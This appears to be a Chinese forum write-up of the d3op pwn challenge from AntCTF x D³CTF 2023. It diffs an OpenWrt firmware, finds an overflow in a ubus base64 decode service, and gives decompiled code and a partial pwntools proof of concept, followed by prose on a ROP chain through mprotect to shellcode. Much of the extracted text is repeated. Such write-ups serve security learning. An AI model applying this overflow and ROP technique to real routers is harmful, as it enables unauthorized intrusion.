-
-
[原创]AntCTF x D³CTF 2023 d3op复盘笔记
-
发表于: 2023-5-12 16:51 20640
-
题目类型为PWN,描述如下:
题目文件:https://github.com/z1r00/ctf-pwn/blob/main/AntCTF%20x%20D%C2%B3CTF/d3op/d3op-attachment-d362854d3418636059155138fd58997c.zip
把题目给的固件进行解包,然后发现是Openwrt 22.03.3
给的HINTS是diff一下,那就再从官网上下载一个22.03.3然后diff一下,diff结果如下
可以看到题目多了network,和base64这两个关键的东西
同时也得知base64是属于ubus模块
ubus list 即可看到当前ubus中注册的接口
如果想要与base64进行交互的话用call,但是需要先知道base64的输入格式是什么
知道了有两个方法,一个是encode和decode,调用如下
可以看到z1r0被base64编码并输出出来,漏洞点大概率就出在base64这里,至此初步分析完成
主函数是参数传递逻辑,当./base64 call 的时候会进入read_input
read_input的逻辑就是可以继续输入一串数据,然后输入的数据进行一些处理之后会筛选出是否存在input,此时会进入下一个check逻辑
看一下ckec
所以当执行./base64 call encode/decode的时候可以正常运行到encode/decode的处理逻辑
至此,得以进入decode/encode的处理逻辑的完整命令是
先看一下decode
在decode最前面,会得到长度。如果decode的时候存在=号则len--,可以看到最后v16中的index并没有进行检查大小,导致溢出
到此漏洞点寻找完成
接下来就是如何去利用这个漏洞,首先看一下保护
可以直接覆盖返回地址来劫持程序流,写出如下poc
调试的时候发现会在下面这个地方SIGSEGV了
看一下汇编
X0这里的地址取错了,0x450 - 8 = 0x448 = v24,在溢出的时候把v24给覆盖了之后导致的SIGSEGV结果
所以需要把v22 v23 v24 v25都处置正确才可以继续
所以写了如下poc
发现可以成功控制ret为0x6262626262626262,接下来就是构造rop
没找到system,但是发现了mprotect
如果可以控制a1,a2,a3就可以直接分配rwx来执行shellcode,用rwctf shellfind的方法来看交叉引用,从而寻找可以控制a1 a2 a3中的一个,并且可以同时执行sub_423340的地址
这样做的原因是因为笔者直接找借助x21 x19然后mov到x1 x2的gadgets,但是控制之后执行sub_423340会因为x21 x19的设置导致一些问题
如果可以控制a1, a2, a3中的任何一个并且可以执行sub_423340,这个时候就可以跳到shellcode那里了
上面这一段就符合要求,控制了x19之后然后再控制x2,最后到上面这一段
官方wp上的要更简单,控制x0即可,然后跳到shellcode那里
shellcode可以用orw,下面是用base64运行时的exp,可以看到flag成功被输出
但是远程的时候会出现问题
result里没有flag的输出,是因为输出的格式是{"output":"flag"},而上面的0x4a2098这里直接存放的是flag,所以需要在一个地址里构造一下{"output": ",然后再将flag放到后面,最后加上"}即可
最终本地exp如下
远程如下
远程交互如下
至此,d3op复盘结束
学到了很多,ubus的通信,如何优雅的使用gadgets(XD
d3opIt might take a long time to start up, please connect about 2 minutes after the gambox start.
HINTS:May be you need to do a diff with the rootfs in attachment.
d3opIt might take a long time to start up, please connect about 2 minutes after the gambox start.
HINTS:May be you need to do a diff with the rootfs in attachment.
_______ ________ __| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 22.03.3, r20028-43d71ad93e
-----------------------------------------------------
_______ ________ __| |.-----.-----.-----.| | | |.----.| |_
| - || _ | -__| || | | || _|| _|
|_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M
-----------------------------------------------------
OpenWrt 22.03.3, r20028-43d71ad93e
-----------------------------------------------------
diff: openwrt/squashfs-root/etc/TZ: No such file or directory
Only in d3op/squashfs-root/etc/config: network
diff: openwrt/squashfs-root/etc/localtime: No such file or directory
diff: openwrt/squashfs-root/etc/mtab: No such file or directory
diff: openwrt/squashfs-root/etc/ppp/resolv.conf: No such file or directory
diff: openwrt/squashfs-root/etc/resolv.conf: No such file or directory
diff --color -aur openwrt/squashfs-root/etc/shadow d3op/squashfs-root/etc/shadow
--- openwrt/squashfs-root/etc/shadow 2023-01-03 08:24:21
+++ d3op/squashfs-root/etc/shadow 2023-04-12 17:33:08
@@ -1,4 +1,4 @@
-root:::0:99999:7:::
+root:$6$JlPmKq/ZhqQ0I6V6$B74FL6cufcnZKT4G0sUz3xNP0Pr4k7yOG2I091f2OFOmcldS2s7CPJwOcfx0r/OshYDOFKw76APIqPHBXCdXb/:19442::::::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
diff: openwrt/squashfs-root/etc/ssl/cert.pem: No such file or directory
Only in d3op/squashfs-root: flag
diff: openwrt/squashfs-root/sbin/insmod: No such file or directory
diff: openwrt/squashfs-root/sbin/lsmod: No such file or directory
diff: openwrt/squashfs-root/sbin/modinfo: No such file or directory
diff: openwrt/squashfs-root/sbin/modprobe: No such file or directory
diff: openwrt/squashfs-root/sbin/rmmod: No such file or directory
diff: openwrt/squashfs-root/usr/bin/scp: No such file or directory
diff: openwrt/squashfs-root/usr/bin/ssh: No such file or directory
diff: openwrt/squashfs-root/usr/bin/wget: No such file or directory
Only in d3op/squashfs-root/usr/libexec/rpcd: base64
diff --color -aur openwrt/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json d3op/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json
--- openwrt/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json 2023-01-03 08:24:21
+++ d3op/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json 2023-04-10 02:25:53
@@ -1,13 +1,17 @@
{
- "unauthenticated": {
- "description": "Access controls for unauthenticated requests",
- "read": {
- "ubus": {
- "session": [
- "access",
- "login"
- ]
- }
- }
- }
+ "unauthenticated": {
+ "description": "Access controls for unauthenticated requests",
+ "read": {
+ "ubus": {
+ "session": [
+ "access",
+ "login"
+ ],
+ "base64": [
+ "decode",
+ "encode"
+ ]
+ }
+ }
+ }
}
diff: openwrt/squashfs-root/etc/TZ: No such file or directory
Only in d3op/squashfs-root/etc/config: network
diff: openwrt/squashfs-root/etc/localtime: No such file or directory
diff: openwrt/squashfs-root/etc/mtab: No such file or directory
diff: openwrt/squashfs-root/etc/ppp/resolv.conf: No such file or directory
diff: openwrt/squashfs-root/etc/resolv.conf: No such file or directory
diff --color -aur openwrt/squashfs-root/etc/shadow d3op/squashfs-root/etc/shadow
--- openwrt/squashfs-root/etc/shadow 2023-01-03 08:24:21
+++ d3op/squashfs-root/etc/shadow 2023-04-12 17:33:08
@@ -1,4 +1,4 @@
-root:::0:99999:7:::
+root:$6$JlPmKq/ZhqQ0I6V6$B74FL6cufcnZKT4G0sUz3xNP0Pr4k7yOG2I091f2OFOmcldS2s7CPJwOcfx0r/OshYDOFKw76APIqPHBXCdXb/:19442::::::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
diff: openwrt/squashfs-root/etc/ssl/cert.pem: No such file or directory
Only in d3op/squashfs-root: flag
diff: openwrt/squashfs-root/sbin/insmod: No such file or directory
diff: openwrt/squashfs-root/sbin/lsmod: No such file or directory
diff: openwrt/squashfs-root/sbin/modinfo: No such file or directory
diff: openwrt/squashfs-root/sbin/modprobe: No such file or directory
diff: openwrt/squashfs-root/sbin/rmmod: No such file or directory
diff: openwrt/squashfs-root/usr/bin/scp: No such file or directory
diff: openwrt/squashfs-root/usr/bin/ssh: No such file or directory
diff: openwrt/squashfs-root/usr/bin/wget: No such file or directory
Only in d3op/squashfs-root/usr/libexec/rpcd: base64
diff --color -aur openwrt/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json d3op/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json
--- openwrt/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json 2023-01-03 08:24:21
+++ d3op/squashfs-root/usr/share/rpcd/acl.d/unauthenticated.json 2023-04-10 02:25:53
@@ -1,13 +1,17 @@
{
- "unauthenticated": {
- "description": "Access controls for unauthenticated requests",
- "read": {
- "ubus": {
- "session": [
- "access",
- "login"
- ]
- }
- }
- }
+ "unauthenticated": {
+ "description": "Access controls for unauthenticated requests",
+ "read": {
+ "ubus": {
+ "session": [
+ "access",
+ "login"
+ ],
+ "base64": [
+ "decode",
+ "encode"
+ ]
+ }
+ }
+ }
}
Only in d3op/squashfs-root/usr/libexec/rpcd: base64
+ "unauthenticated": {
+ "description": "Access controls for unauthenticated requests",
+ "read": {
+ "ubus": {
+ "session": [
+ "access",
+ "login"
+ ],
+ "base64": [
+ "decode",
+ "encode"
+ ]
+ }
+ }
+ }
Only in d3op/squashfs-root/usr/libexec/rpcd: base64
+ "unauthenticated": {
+ "description": "Access controls for unauthenticated requests",
+ "read": {
+ "ubus": {
+ "session": [
+ "access",
+ "login"
+ ],
+ "base64": [
+ "decode",
+ "encode"
+ ]
+ }
+ }
+ }
- list [<path>] List objects
- call <path> <method> [<message>] Call an object method
- listen [<path>...] Listen for events
- send <type> [<message>] Send an event
- wait_for <object> [<object>...] Wait for multiple objects to appear on ubus
- list [<path>] List objects
- call <path> <method> [<message>] Call an object method
- listen [<path>...] Listen for events
- send <type> [<message>] Send an event
- wait_for <object> [<object>...] Wait for multiple objects to appear on ubus
root@(none):/# ubus list
base64containerdhcpfilehotplug.dhcphotplug.ifacehotplug.neighhotplug.nethotplug.ntphotplug.tftpiwinfoluciluci-rpc
networknetwork.devicenetwork.interfacenetwork.interface.lannetwork.interface.loopbacknetwork.rrdnsnetwork.wirelessrcservicesessionsystemuciroot@(none):/# ubus list
base64containerdhcpfilehotplug.dhcphotplug.ifacehotplug.neighhotplug.nethotplug.ntphotplug.tftpiwinfoluciluci-rpc
networknetwork.devicenetwork.interfacenetwork.interface.lannetwork.interface.loopbacknetwork.rrdnsnetwork.wirelessrcservicesessionsystemuciroot@(none):/# ubus -v list base64
'base64' @1e449b72
"encode":{"input":"String"}
"decode":{"input":"String"}
root@(none):/# ubus -v list base64
'base64' @1e449b72
"encode":{"input":"String"}
"decode":{"input":"String"}
root@(none):/# ubus call base64 encode '{"input" : "z1r0"}'
{ "output": "ejFyMAA="
}root@(none):/# ubus call base64 encode '{"input" : "z1r0"}'
{ "output": "ejFyMAA="
}int __cdecl main(int argc, const char **argv, const char **envp)
{ char v6[4096]; // [xsp+28h] [xbp-1028h] BYREF
unsigned __int64 *specific_method; // [xsp+1028h] [xbp-28h]
__int64 v8; // [xsp+1030h] [xbp-20h]
__int64 *v9; // [xsp+1038h] [xbp-18h]
int v10; // [xsp+1044h] [xbp-Ch]
unsigned __int64 *method; // [xsp+1048h] [xbp-8h]
init_base64(); // base64表
if ( argc <= 1 )
return 0;
method = argv[1];
if ( check_method(method, "list") )
{
v10 = read_input(0, v6, 0xFFFuLL);
v6[v10] = 0;
v9 = sub_402478(v6);
if ( v9 )
{
v8 = sub_403C90(v9, "input");
if ( v8 && sub_4059D0(v8) )
{
specific_method = argv[2];
if ( !check_method(method, "call") )
{
ckec(specific_method, *(v8 + 32), byte_4A2098);
sub_40B230("{\"output\": \"%s\"}\n", byte_4A2098);
sub_400A10(v9);
}
return 0;
}
else
{
return 0;
}
}
else
{
return 0;
}
}
else
{
uloop_init();
return 0;
}
}int __cdecl main(int argc, const char **argv, const char **envp)
{ char v6[4096]; // [xsp+28h] [xbp-1028h] BYREF
unsigned __int64 *specific_method; // [xsp+1028h] [xbp-28h]
__int64 v8; // [xsp+1030h] [xbp-20h]
__int64 *v9; // [xsp+1038h] [xbp-18h]
int v10; // [xsp+1044h] [xbp-Ch]
unsigned __int64 *method; // [xsp+1048h] [xbp-8h]
init_base64(); // base64表
if ( argc <= 1 )
return 0;
method = argv[1];
if ( check_method(method, "list") )
{
v10 = read_input(0, v6, 0xFFFuLL);
v6[v10] = 0;
v9 = sub_402478(v6);
if ( v9 )
{
v8 = sub_403C90(v9, "input");
if ( v8 && sub_4059D0(v8) )
{
specific_method = argv[2];
if ( !check_method(method, "call") )
{
ckec(specific_method, *(v8 + 32), byte_4A2098);
sub_40B230("{\"output\": \"%s\"}\n", byte_4A2098);
sub_400A10(v9);
}
return 0;
}
else
{
return 0;
}
}
else
{
return 0;
}
}
else
{
uloop_init();
return 0;
}
}unsigned __int64 __fastcall sub_422E60(int a1, void *a2, size_t a3)
{ unsigned __int64 v4; // x19
unsigned int v8; // w3
unsigned __int64 v9; // x19
int v10; // w2
int v11; // w2
if ( byte_4A0F78 )
{
v4 = linux_eabi_syscall(__NR_read, a1, a2, a3);
if ( v4 > 0xFFFFFFFFFFFFF000LL )
{
v10 = -v4;
v4 = -1LL;
*(&dword_4A8590 + _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2))) = v10;
}
return v4;
}
else
{
v8 = sub_444C30();
v9 = linux_eabi_syscall(__NR_read, a1, a2, a3);
if ( v9 > 0xFFFFFFFFFFFFF000LL )
{
v11 = -v9;
v9 = -1LL;
*(&dword_4A8590 + _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2))) = v11;
}
sub_444CC0(v8);
return v9;
}
}unsigned __int64 __fastcall sub_422E60(int a1, void *a2, size_t a3)
{ unsigned __int64 v4; // x19
unsigned int v8; // w3
unsigned __int64 v9; // x19
int v10; // w2
int v11; // w2
if ( byte_4A0F78 )
{
v4 = linux_eabi_syscall(__NR_read, a1, a2, a3);
if ( v4 > 0xFFFFFFFFFFFFF000LL )
{
v10 = -v4;
v4 = -1LL;
*(&dword_4A8590 + _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2))) = v10;
}
return v4;
}
else
{
v8 = sub_444C30();
v9 = linux_eabi_syscall(__NR_read, a1, a2, a3);
if ( v9 > 0xFFFFFFFFFFFFF000LL )
{
v11 = -v9;
v9 = -1LL;
*(&dword_4A8590 + _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2))) = v11;
}
sub_444CC0(v8);
return v9;
}
}ckec(specific_method, *(v8 + 32), byte_4A2098);
sub_40B230("{\"output\": \"%s\"}\n", byte_4A2098);
sub_400A10(v9);ckec(specific_method, *(v8 + 32), byte_4A2098);
sub_40B230("{\"output\": \"%s\"}\n", byte_4A2098);
sub_400A10(v9);__int64 __fastcall sub_4064F0(unsigned __int64 *a1, __int64 a2, __int64 a3)
{ if ( check_method(a1, "encode") )
{
if ( !check_method(a1, "decode") )
decode(a2, a3);
}
else
{
encode(a2, a3);
}
return 0LL;
}__int64 __fastcall sub_4064F0(unsigned __int64 *a1, __int64 a2, __int64 a3)
{ if ( check_method(a1, "encode") )
{
if ( !check_method(a1, "decode") )
decode(a2, a3);
}
else
{
encode(a2, a3);
}
return 0LL;
}➜ squashfs-root ./base64 call encode
{"input" : "z1r0"}
{"output": "ejFyMAA="}
➜ squashfs-root ./base64 call encode
{"input" : "z1r0"}
{"output": "ejFyMAA="}
__int64 __fastcall decode(char *json_input, __int64 out_put)
{ int v3; // w0
int v4; // w0
int v5; // w0
int v6; // w0
int v7; // w0
int v8; // w0
int v9; // w0
int v10; // w0
int v11; // w0
int v12; // w0
int v13; // w0
char v16[1028]; // [xsp+28h] [xbp+28h]
int v17; // [xsp+42Ch] [xbp+42Ch]
int v18; // [xsp+430h] [xbp+430h]
int v19; // [xsp+434h] [xbp+434h]
int v20; // [xsp+438h] [xbp+438h]
int v21; // [xsp+43Ch] [xbp+43Ch]
unsigned int size; // [xsp+440h] [xbp+440h]
unsigned int v23; // [xsp+444h] [xbp+444h]
unsigned int v24; // [xsp+448h] [xbp+448h]
unsigned int len; // [xsp+44Ch] [xbp+44Ch]
size = sub_400300();
if ( (size & 3) != 0 )
return 0LL;
len = 3 * (size >> 2);
if ( json_input[size - 1] == '=' )
--len;
if ( json_input[size - 2] == 61 )
--len;
if ( out_put )
{
v24 = 0;
v23 = 0;
while ( size > v24 )
{
if ( json_input[v24] == 61 )
{
++v24;
v3 = 0;
}
else
{
v4 = v24++;
v3 = byte_4A1F98[json_input[v4]];
}
v21 = v3;
if ( json_input[v24] == 61 )
{
++v24;
v5 = 0;
}
else
{
v6 = v24++;
v5 = byte_4A1F98[json_input[v6]];
}
v20 = v5;
if ( json_input[v24] == 61 )
{
++v24;
v7 = 0;
}
else
{
v8 = v24++;
v7 = byte_4A1F98[json_input[v8]];
}
v19 = v7;
if ( json_input[v24] == 61 )
{
++v24;
v9 = 0;
}
else
{
v10 = v24++;
v9 = byte_4A1F98[json_input[v10]];
}
v18 = v9;
v17 = v9 + (v21 << 18) + (v20 << 12) + (v19 << 6);
if ( len > v23 )
{
v11 = v23++;
v16[v11] = BYTE2(v17);
}
if ( len > v23 )
{
v12 = v23++;
v16[v12] = BYTE1(v17);
}
if ( len > v23 )
{
v13 = v23++;
v16[v13] = v17;
}
}
sub_4002B0();
}
return 0LL;
}__int64 __fastcall decode(char *json_input, __int64 out_put)
{ int v3; // w0
int v4; // w0
int v5; // w0
int v6; // w0
int v7; // w0
int v8; // w0
int v9; // w0
int v10; // w0
int v11; // w0
int v12; // w0
int v13; // w0
char v16[1028]; // [xsp+28h] [xbp+28h]
int v17; // [xsp+42Ch] [xbp+42Ch]
int v18; // [xsp+430h] [xbp+430h]
int v19; // [xsp+434h] [xbp+434h]
int v20; // [xsp+438h] [xbp+438h]
int v21; // [xsp+43Ch] [xbp+43Ch]
unsigned int size; // [xsp+440h] [xbp+440h]
unsigned int v23; // [xsp+444h] [xbp+444h]
unsigned int v24; // [xsp+448h] [xbp+448h]
unsigned int len; // [xsp+44Ch] [xbp+44Ch]
size = sub_400300();
if ( (size & 3) != 0 )
return 0LL;
len = 3 * (size >> 2);
if ( json_input[size - 1] == '=' )
--len;
if ( json_input[size - 2] == 61 )
--len;
if ( out_put )
{
v24 = 0;
v23 = 0;
while ( size > v24 )
{
if ( json_input[v24] == 61 )
{
++v24;
v3 = 0;
}
else
{
v4 = v24++;
v3 = byte_4A1F98[json_input[v4]];
}
v21 = v3;
if ( json_input[v24] == 61 )
{
++v24;
v5 = 0;
}
else
{
v6 = v24++;
v5 = byte_4A1F98[json_input[v6]];
}
v20 = v5;
if ( json_input[v24] == 61 )
{
++v24;
v7 = 0;
}
else
{
v8 = v24++;
v7 = byte_4A1F98[json_input[v8]];
}
v19 = v7;
if ( json_input[v24] == 61 )
{
++v24;
v9 = 0;
}
else
{
v10 = v24++;
v9 = byte_4A1F98[json_input[v10]];
}
v18 = v9;
v17 = v9 + (v21 << 18) + (v20 << 12) + (v19 << 6);
if ( len > v23 )
{
v11 = v23++;
v16[v11] = BYTE2(v17);
}
if ( len > v23 )
{
v12 = v23++;
v16[v12] = BYTE1(v17);
}
if ( len > v23 )
{
v13 = v23++;
v16[v13] = v17;
}
}
sub_4002B0();
}
return 0LL;
}Arch: aarch64-64-little
RELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000)
Arch: aarch64-64-little
RELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000)
from pwn import *
from os import system
import base64
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
file_name = './base64'
r = process([file_name, 'call', 'decode'])
def dbgg():
raw_input()
elf = ELF(file_name)
dbgg()p1 = b'aaaa'
p1 = p1.ljust(0x458, b"a")
p1 = base64.b64encode(p1)
ret = 0x406550
li(p1)p2 = b'{"input":"' + p1 + b'"}'
li(p2)r.sendline(p2)r.interactive()from pwn import *
from os import system
import base64
li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')
file_name = './base64'
r = process([file_name, 'call', 'decode'])
def dbgg():
raw_input()
elf = ELF(file_name)
dbgg()p1 = b'aaaa'
p1 = p1.ljust(0x458, b"a")
p1 = base64.b64encode(p1)
ret = 0x406550
li(p1)p2 = b'{"input":"' + p1 + b'"}'
li(p2)[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2023-5-12 17:00
被z1r0编辑
,原因:
赞赏记录
参与人
雪币
留言
时间
l1s00t
为你点赞~
2024-2-11 21:47
一笑人间万事
为你点赞~
2023-12-25 01:13
TTY_
为你点赞~
2023-5-29 12:52
安和桥南
为你点赞~
2023-5-15 09:32
vay
为你点赞~
2023-5-13 09:50
赞赏
|
|
|---|---|
|
|
他的文章
赞赏
雪币:
留言:
